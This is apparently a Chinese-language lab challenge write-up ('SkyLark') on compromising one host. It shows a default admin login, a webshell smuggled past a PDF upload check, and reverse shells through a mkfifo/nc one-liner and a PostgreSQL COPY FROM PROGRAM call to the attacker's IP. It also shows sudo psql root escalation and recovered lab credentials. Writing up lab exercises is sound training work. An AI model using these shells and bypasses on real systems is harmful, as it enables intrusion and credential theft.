Challenge 3 - SkyLark(2)

 Challenge 3 - SkyLark(2)

下一台目標選定 .225



Rustscan,└─$ rustscan -a 192.168.211.225 --scripts none --ulimit 5000 | tee rustscan

只有 3 個 Port,21、80、8090



snmp check



nmap



whatweb



80 /



80 /robots.txt



gobuster 沒有東西



8090 /



8090 /robots.txt



gobuster 8090



gobuster 8090/backend



gobuster 8090/backend/default



http://192.168.211.225:8090/backend/default/index.php 有個登入頁面



admin:admin 既然可以登入.......看來可以上傳檔案



上傳 test.txt 告知只能上傳 pdf 檔案



改副檔名 test.pdf 上傳一樣失敗,看來會檢查檔案的格式



真實上傳一個 PDF 的檔案格式,看來就能正常上傳了




也可以在 http://192.168.196.225:8090/backend/default/uploads/test.pdf 正常讀取到檔案



修改 webshell 註記是 PDF 檔案格式,於檔案表頭加入 %PDF-1.7

上傳 webshell.php 測試發現成功,也可以正常開啟

http://192.168.196.225:8090/backend/default/uploads/webshell.php



執行 whoami 可以正常執行



使用最好用的 rm 指令,rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.167 4444 >/tmp/f 直接拿到 Reverse Shell 了



先拿取第一階段的 flag



在路徑 /var/www/backend/default 下有一個 config.php 檔案裡面有資料路連接的憑證

postgres:EAZT5EMULA75F8MC



cat /etc/passwd 有兩個使用者帳號 uploader、ftpuploader



cat /etc/crontab



5432 Port 標準的 PostgreSQL



搭建 chisel,./chisel client 192.168.45.167:8080 R:5432:localhost:5432



啟動 DB 連線工具 dbeaver,測試帳號密碼 postgres:EAZT5EMULA75F8MC 連線成功



啟動後執行 SQL Command "SELECT pg_ls_dir('/');" 如下圖看來可以透過

SQL Command 列舉目錄沒有問題

相關的命令參考 : https://medium.com/@netscylla/postgres-hacking-part-2-code-execution-687d24ad2082



依據介紹的枚舉,建立一個 table 然後用來存放檔案資訊再列舉



建立 TABLE



COPY /etc/passwd



查詢 root 看來沒有問題



改直接去讀取 /root/proof.txt 看看權限如何

CREATE TABLE temp2(t TEXT);

COPY temp FROM '/root/proof.txt';

SELECT * FROM temp2 limit 2 offset 0;

執行第二步的時候失敗,權限不夠



接下來將 TABLE 塞入 cmd 然後執行看看

CREATE TABLE temp3(cmd_output TEXT); COPY temp3 FROM PROGRAM '/tmp/nc -e /bin/bash 192.168.45.167 4447';

4447 進來了,whoami & id 確認現在的權限變成 postgres



sudo -l 發現可以用 sudo 執行 psql 所有東西



參考 GTFO 如下




直接用 sudo 執行 /usr/bin/psql 到本機的 postgreSQL,然後輸入原有的密碼

sudo /usr/bin/psql -h 127.0.0.1 -p 5432 -U postgres

依序輸入 \? & !/bin/sh 成功 root

PS : 有另外測試直接輸入 \! /bin/sh 即可成功 root



更新攻擊列表




繼續在 .225 枚舉發現,原本 /uploads 路徑下有個 user-guide-rdweb.pdf 檔案



內容告訴你有個 /RDWeb 網頁可以讓你用 Web 版的 RDP

帳號 : SKYLARK\kiosk

密碼 : XEwUS^9R2Gwt8O914

看來我們獲得了第一個 SKYLARK 網域的使用者帳號密碼




更新帳號密碼表



留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)